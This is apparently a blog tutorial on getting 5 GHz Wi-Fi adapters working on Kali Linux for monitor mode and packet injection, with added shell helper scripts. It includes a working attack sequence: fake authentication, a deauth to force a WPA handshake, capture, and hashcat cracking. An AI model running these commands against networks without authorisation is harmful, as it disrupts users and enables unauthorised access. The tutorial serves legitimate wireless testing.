How to get your new 5 GHz wireless penetration gear up and working

Adam Toscher
Feb 15, 2018 · 9 min read

What new wireless .ac cards work with the latest rolling Kali release (4.14)?

root@kali:~# lsusb
Bus 001 Device 002: ID 148f:3572 Ralink Technology, Corp. RT3572 Wireless Adapter
# airmon-ng start wlan0
# history
1 apt-get update && apt-get upgrade
2 apt-get dist-upgrade

root@kali:~# uname -ar
Linux kali 4.14.0-kali3-amd64 #1 SMP Debian 4.14.12-2kali1 (2018-01-08) x86_64 GNU/Linux

Install Wireless Drivers with Kali rolling

AWUS036ACH & AWUS1900

$ apt install realtek-rtl88xxau-dkms

Setting monitor mode manually

Set interface down:
$ sudo ip link set wlan0 down
Set monitor mode:
$ sudo iwconfig wlan0 mode monitor
Set interface up:
$ sudo ip link set wlan0 up

For switching channels (interface must be up):

Set channel 6, width 40 MHz:
$ sudo iw wlan0 set channel 6 HT40-
Set channel 149, width 80 MHz:
$ sudo iw wlan0 set freq 5745 80 5775

For setting TX power (doesn’t work on every card):

$ sudo iwconfig wlan0 txpower 30
or
$ sudo iw wlan0 set txpower fixed 3000
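The monitor-mode and channel-switching steps above, as an added shell example that is not from the original post: it computes the frequency arguments `iw` needs for a given channel (the `5745 80 5775` triple above is channel 149 sitting in the 80 MHz block centred on channel 155), and it checks the result against `iw dev` output before a capture starts, since a card that silently stayed in managed mode or on the wrong channel is the usual reason airodump-ng sees nothing. The interface names and the `iw dev` listing are constructed for illustration; `monitor_mode` needs root and a real card and is defined but not run at load time.

```shell
#!/bin/sh
# Added example (not from the original post): helpers for the monitor-mode and
# channel steps above. Interface names and the sample `iw dev` output are
# constructed for illustration.

# chan_to_freq CHANNEL
# Primary channel center frequency in MHz for a 2.4 GHz or 5 GHz channel
# number; this is the first argument `iw <dev> set freq` wants.
chan_to_freq() {
  ch=$1
  if [ "$ch" -ge 1 ] && [ "$ch" -le 13 ]; then
    echo $((2407 + $ch * 5))
  elif [ "$ch" -eq 14 ]; then
    echo 2484                       # Japan-only channel, off the 5 MHz grid
  elif [ "$ch" -ge 32 ] && [ "$ch" -le 177 ]; then
    echo $((5000 + $ch * 5))
  else
    echo "chan_to_freq: unknown channel $ch" >&2
    return 1
  fi
}

# vht80_center CHANNEL
# Center frequency (MHz) of the 80 MHz block containing a 5 GHz channel.
# Blocks 36-48, 52-64, 100-112, 116-128 and 132-144 are 16 channel numbers
# wide starting at 36, so the center is block start + 6; UNII-3 is offset by
# one and uses 149-161 (center 155 = 5775 MHz, the value in the post).
vht80_center() {
  ch=$1
  if { [ "$ch" -ge 36 ] && [ "$ch" -le 64 ]; } ||
     { [ "$ch" -ge 100 ] && [ "$ch" -le 144 ]; }; then
    start=$((36 + ($ch - 36) / 16 * 16))
    echo $((5000 + (start + 6) * 5))
  elif [ "$ch" -ge 149 ] && [ "$ch" -le 161 ]; then
    echo 5775
  elif [ "$ch" -ge 165 ] && [ "$ch" -le 177 ]; then
    echo 5855
  else
    echo "vht80_center: channel $ch has no 80 MHz block" >&2
    return 1
  fi
}

# iw_freq_cmd IFACE CHANNEL [WIDTH]
# Print the `iw` command that tunes IFACE to CHANNEL at 20 or 80 MHz, in the
# same form as the channel 149 example above.
iw_freq_cmd() {
  iface=$1; ch=$2; width=${3:-20}
  freq=$(chan_to_freq "$ch") || return 1
  case $width in
    20) echo "iw $iface set freq $freq" ;;
    80) center=$(vht80_center "$ch") || return 1
        echo "iw $iface set freq $freq 80 $center" ;;
    *)  echo "iw_freq_cmd: unsupported width $width" >&2; return 1 ;;
  esac
}

# parse_iw_dev IFACE   (reads `iw dev` output on stdin)
# Print "<type> <channel>" for IFACE so a script can confirm the card really
# is in monitor mode on the intended channel before a capture starts.
parse_iw_dev() {
  awk -v want="$1" '
    $1 == "Interface" { cur = $2 }
    cur == want && $1 == "type"    { ty = $2 }
    cur == want && $1 == "channel" { ch = $2 }
    END { if (ty == "") exit 1; print ty, (ch == "" ? "none" : ch) }'
}

# Constructed `iw dev` listing for a card tuned like the example above; this
# is sample data, not output from the author's machine.
SAMPLE_IW_DEV='phy#1
    Interface wlan1
        ifindex 5
        wdev 0x100000001
        addr 02:00:00:00:01:00
        type monitor
        channel 149 (5745 MHz), width: 80 MHz, center1: 5775 MHz
        txpower 30.00 dBm'

# monitor_mode IFACE CHANNEL [WIDTH]
# The post's manual steps (down, monitor, up, tune) plus a verification step.
# `iw ... set type monitor` is the iw equivalent of `iwconfig ... mode monitor`.
# Needs root and a real card, so it is defined here but not run at load time.
monitor_mode() {
  iface=$1; ch=$2; width=${3:-20}
  ip link set "$iface" down &&
  iw "$iface" set type monitor &&
  ip link set "$iface" up &&
  eval "$(iw_freq_cmd "$iface" "$ch" "$width")" &&
  state=$(iw dev | parse_iw_dev "$iface") &&
  [ "$state" = "monitor $ch" ]
}

# Offline demonstration on the constructed sample:
iw_freq_cmd wlan1 149 80
printf '%s\n' "$SAMPLE_IW_DEV" | parse_iw_dev wlan1
```

The `HT40-` form on the 2.4 GHz line above is a different request (a 40 MHz channel with the secondary 20 MHz below the primary), so the helper deliberately only handles the 20 and 80 MHz cases the 5 GHz commands use.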

Troubleshooting

apt-cache search linux-image
apt install dkms &&
apt-get install bc &&
apt-get install build-essential &&
apt-get install linux-headers-$(uname -r)
git clone https://github.com/aircrack-ng/rtl8812au

Test

airodump-ng wlan1 --band ag -M -U --wps --beacons -w captureallthewireless
# ifconfig wlan0
# aireplay-ng wlan0 -9
10:09:24 Trying broadcast probe requests..

Install the latest Kismet

Installation instructions taken from kismet’s git page.

sudo apt-get install build-essential git libmicrohttpd-dev \
  zlib1g-dev libnl-3-dev libnl-genl-3-dev libcap-dev \
  libpcap-dev libncurses5-dev libnm-dev libdw-dev \
  libsqlite3-dev

Clone Kismet from git. If you haven't cloned Kismet before:

$ git clone https://www.kismetwireless.net/git/kismet.git

If you already have a Kismet checkout, update it instead:

$ cd kismet
$ git pull

Run the configure script from the source directory:

$ cd kismet
$ ./configure

Compile Kismet.

$ make

Kismet

./kismet wlan0
Point your browser at http://localhost:2501
elkentaro/KismetMobileDashboard

802.11ac Wireless Attacks

iwconfig wlan1 channel 149
root@kali:~# aireplay-ng | more
Aireplay-ng 1.2 rc4 - (C) 2006-2015 Thomas d'Otreppe
https://www.aircrack-ng.org

usage: aireplay-ng <options> <replay interface>

Filter options:
-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
-D : disable AP detection
root@kali:~# aireplay-ng -D --test -e ssid -a P4:E4:E4:92:60:71 wlan1
10:53:10 Trying broadcast probe requests...
10:53:12 No Answer...
10:53:12 Found 1 AP
10:53:12 Trying directed probe requests...
10:53:12 C4:E9:84:9F:60:71 - channel: 0 - 'shameless-karma!'
10:53:18 0/30: 0%
root@kali:~# iwconfig wlan1 channel 149
root@kali:~# aireplay-ng -D --test -e ssid -a P4:E4:E4:92:60:71 wlan1
10:53:27 Trying broadcast probe requests...
10:53:29 No Answer...
10:53:29 Found 1 AP
10:53:29 Trying directed probe requests...
10:53:29 P4:E4:E4:92:60:71 - channel: 0 - 'shameless-karma!'
10:53:29 Ping (min/avg/max): 0.914ms/2.795ms/5.201ms Power: -37.61
10:53:29 28/30: 93%
10:53:29 Injection is working!
aireplay-ng -D --fakeauth 6000 -o 1 -q 10 -a 20:AA:XX:XX:XX:XX \
-h E0:F8:XX:XX:XX:XX -e MYISPSUCKS-5G wlan0mon
# put your network device into monitor mode
Set interface down
$ sudo ip link set wlan0 down
Set monitor mode
# iwconfig wlan0 mode monitor
Set interface up
# ip link set wlan0 up
# listen for all nearby beacon frames to get target BSSID and
# airodump-ng wlan0 --band abg
Set 5 GHz channel
# iwconfig wlan0 channel 149
Start listening for the handshake
# airodump-ng -c 149 --bssid P4:E4:E4:92:60:71 -w cap01.cap wlan0
Optionally deauth a connected client to force a handshake
# aireplay-ng -D -0 2 -a 9C:5C:8E:C9:AB:C0 -c P4:E4:E4:92:60:71 wlan0
Convert cap to hccapx
root@kali:~# aircrack-ng -J file.cap capture.hccap
Crack with hashcat:
> hashcat.exe -m 2500 capture.hccapx rockyou.txt
git clone https://github.com/wpatoolkit/Cap-Converter

5 GHz Injection Tests

apt install realtek-rtl88xxau-dkms
root@kali:~# airmon-ng
PHY  Interface  Driver     Chipset
phy0 wlan0      8814au     Realtek Semiconductor Corp.
phy1 wlan1      rt2800usb  Ralink Technology, Corp. RT3572
phy3 wlan2      8812au     Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac WLAN Adapter
phy5 wlan3      8812au     Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac WLAN Adapter
phy4 wlan4      rt2800usb  Ralink Technology, Corp. RT2770
root@kali:~# iwconfig wlan2 channel 149
root@kali:~# iwconfig wlan3 channel 56
root@kali:~# aireplay-ng -D -9 -i wlan2 wlan3
14:55:33 Trying broadcast probe requests...
14:55:34 No Answer...
14:55:34 Found 1 AP
14:55:34 Trying directed probe requests...
14:55:34 P4:29:88:9F:60:71 - channel: 149 - 'ssid'
14:55:35 Ping (min/avg/max): 0.735ms/3.759ms/9.462ms Power: -37.77
14:55:35 30/30: 100%
14:55:35 Injection is working!
14:55:35 Trying card-to-card injection...
14:55:35 Attack -0: OK
14:55:35 Attack -1 (open): OK
14:55:35 Attack -1 (psk): OK
14:55:35 Attack -2/-3/-4/-6: OK
14:55:35 Attack -5/-7: OK
root@kali:~# iwconfig

wlan2 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=18 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off

lo no wireless extensions.
wlan1 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=30 dBm
Retry short long limit:2 RTS thr:off Fragment thr:off
Power Management:off

wlan4 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=30 dBm
Retry short long limit:2 RTS thr:off Fragment thr:off
Power Management:off

wlan0 IEEE 802.11 Mode:Monitor Frequency:2.452 GHz Tx-Power=18 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off

wlan3 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=18 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off

eth0 no wireless extensions.
root@kali:~# iwconfig wlan1 channel 36
root@kali:~# iwconfig wlan4 channel 149
root@kali:~# aireplay-ng -D -9 -i wlan1 wlan4
root@kali:~# iwconfig wlan4 channel 149
root@kali:~# aireplay-ng -D -9 -i wlan1 wlan4
15:10:11 Trying broadcast probe requests...
15:10:13 No Answer...
15:10:13 Found 1 AP
15:10:13 Trying directed probe requests...
15:10:13 BF:E9:54:9F:T0:71 - channel: 149 - 'shameonyou'
15:10:13 Ping (min/avg/max): 0.330ms/6.444ms/12.453ms Power: -26.00
15:10:13 30/30: 100%
15:10:13 Injection is working!
15:10:13 Trying card-to-card injection...
15:10:13 Attack -0: OK
15:10:13 Attack -1 (open): OK
15:10:13 Attack -1 (psk): OK
15:10:13 Attack -2/-3/-4/-6: OK
15:10:17 Attack -5/-7: Failed

root@kali:~# iwconfig
wlan2 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=18 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off

lo no wireless extensions.
wlan1 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=30 dBm
Retry short long limit:2 RTS thr:off Fragment thr:off
Power Management:off

wlan4 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=30 dBm
Retry short long limit:2 RTS thr:off Fragment thr:off
Power Management:off

wlan0 IEEE 802.11 Mode:Monitor Frequency:2.452 GHz Tx-Power=18 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off

wlan3 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=18 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off

eth0 no wireless extensions.
root@kali:~# airmon-ng
PHY  Interface  Driver     Chipset
phy0 wlan0      8814au     Realtek Semiconductor Corp.
phy1 wlan1      rt2800usb  Ralink Technology, Corp. RT3572
phy3 wlan2      8812au     Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac WLAN Adapter
phy5 wlan3      8812au     Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac WLAN Adapter
phy4 wlan4      rt2800usb  Ralink Technology, Corp. RT2770
root@kali:~# aireplay-ng -D -9 wlan0 wlan1
"aireplay-ng --help" for help.
root@kali:~# aireplay-ng -D -9 wlan1
15:20:11 Trying broadcast probe requests...
15:20:13 No Answer...
15:20:13 Found 0 APs
root@kali:~# iwconfig wlan1 channel 149
root@kali:~# aireplay-ng -D -9 wlan1
15:20:21 Trying broadcast probe requests...
15:20:21 Injection is working!
15:20:23 Found 1 AP
15:20:23 Trying directed probe requests...
15:20:23 V4:E9:F4:9F:Z0:71 - channel: 149 - 'yourssidrules'
15:20:23 Ping (min/avg/max): 0.901ms/10.325ms/14.429ms Power: -26.00
15:20:23 30/30: 100%
root@kali:~# aireplay-ng -D -9 wlan0
15:20:47 Trying broadcast probe requests...
15:20:49 No Answer...
15:20:49 Found 0 APs
root@kali:~# airmon-ng
PHY  Interface  Driver     Chipset
phy6 wlan0      8814au     Realtek Semiconductor Corp. - partially working
phy1 wlan1      rt2800usb  Ralink Technology, Corp. RT3572 - working
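The sessions in this section are what decide whether a card "works" on a given 5 GHz channel, and the result is tallied by hand at the end. As an added shell example that is not from the original post, the helper below reads one `aireplay-ng -9` session and reduces it to the same verdict: no AP seen on that channel (retune before blaming the card, as happened with wlan1 on its original channel above), probe injection not working, working, or partially working when a card-to-card attack group fails as in the wlan1/wlan4 run. The three sessions embedded in the script are constructed to mirror the output format shown on this page; the MAC addresses and SSIDs are placeholders, not captured values.

```shell
#!/bin/sh
# Added example (not from the original post): summarise an `aireplay-ng -9`
# injection-test session into a single verdict. The sample sessions below are
# constructed to match the output format shown on the page.

# injection_verdict   (reads one aireplay-ng -9 session on stdin)
# Prints: <verdict> aps=<n> probes=<answered>/<sent> failed_attacks=<n>[ (<group>)...]
# Verdicts: no-ap-seen, not-working, partially-working, working.
injection_verdict() {
  awk '
    /Found [0-9]+ APs?/                 { aps = $3 }
    /Injection is working/              { inj = 1 }
    # "hh:mm:ss 30/30: 100%" is the directed-probe success ratio
    /^[0-9:]+ [0-9]+\/[0-9]+: [0-9]+%/  { split($2, r, "/"); ok = r[1]; sub(":", "", r[2]); total = r[2] }
    /Attack .*: OK/                     { pass++ }
    /Attack .*: Failed/                 { fail++; g = $3; sub(":", "", g); failed = failed " (" g ")" }
    END {
      if (ok == "") { ok = "-"; total = "-" }
      if (aps == "" || aps == 0)   verdict = "no-ap-seen"
      else if (!inj)               verdict = "not-working"
      else if (fail > 0)           verdict = "partially-working"
      else                         verdict = "working"
      printf "%s aps=%d probes=%s/%s failed_attacks=%d%s\n", verdict, aps + 0, ok, total, fail + 0, failed
    }'
}

# Constructed sessions (placeholder BSSIDs and SSIDs), one per outcome.
SESSION_OK="14:55:33 Trying broadcast probe requests...
14:55:34 No Answer...
14:55:34 Found 1 AP
14:55:34 Trying directed probe requests...
14:55:34 02:00:00:00:00:01 - channel: 149 - 'lab-ap'
14:55:35 Ping (min/avg/max): 0.735ms/3.759ms/9.462ms Power: -37.77
14:55:35 30/30: 100%
14:55:35 Injection is working!
14:55:35 Trying card-to-card injection...
14:55:35 Attack -0: OK
14:55:35 Attack -1 (open): OK
14:55:35 Attack -1 (psk): OK
14:55:35 Attack -2/-3/-4/-6: OK
14:55:35 Attack -5/-7: OK"

SESSION_PARTIAL="15:10:11 Trying broadcast probe requests...
15:10:13 No Answer...
15:10:13 Found 1 AP
15:10:13 Trying directed probe requests...
15:10:13 02:00:00:00:00:02 - channel: 149 - 'lab-ap'
15:10:13 Ping (min/avg/max): 0.330ms/6.444ms/12.453ms Power: -26.00
15:10:13 30/30: 100%
15:10:13 Injection is working!
15:10:13 Trying card-to-card injection...
15:10:13 Attack -0: OK
15:10:13 Attack -1 (open): OK
15:10:13 Attack -1 (psk): OK
15:10:13 Attack -2/-3/-4/-6: OK
15:10:17 Attack -5/-7: Failed"

SESSION_NOAP="15:20:11 Trying broadcast probe requests...
15:20:13 No Answer...
15:20:13 Found 0 APs"

# Demonstration on the constructed sessions:
for s in "$SESSION_OK" "$SESSION_PARTIAL" "$SESSION_NOAP"; do
  printf '%s\n' "$s" | injection_verdict
done
```

Run it against a real session with `aireplay-ng -D -9 -i wlanX wlanY 2>&1 | tee test.log; injection_verdict < test.log`; a `no-ap-seen` result on a card that should work usually means the test card is still on a 2.4 GHz channel, which is exactly what the `iwconfig wlan1 channel 149` retune above fixed.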
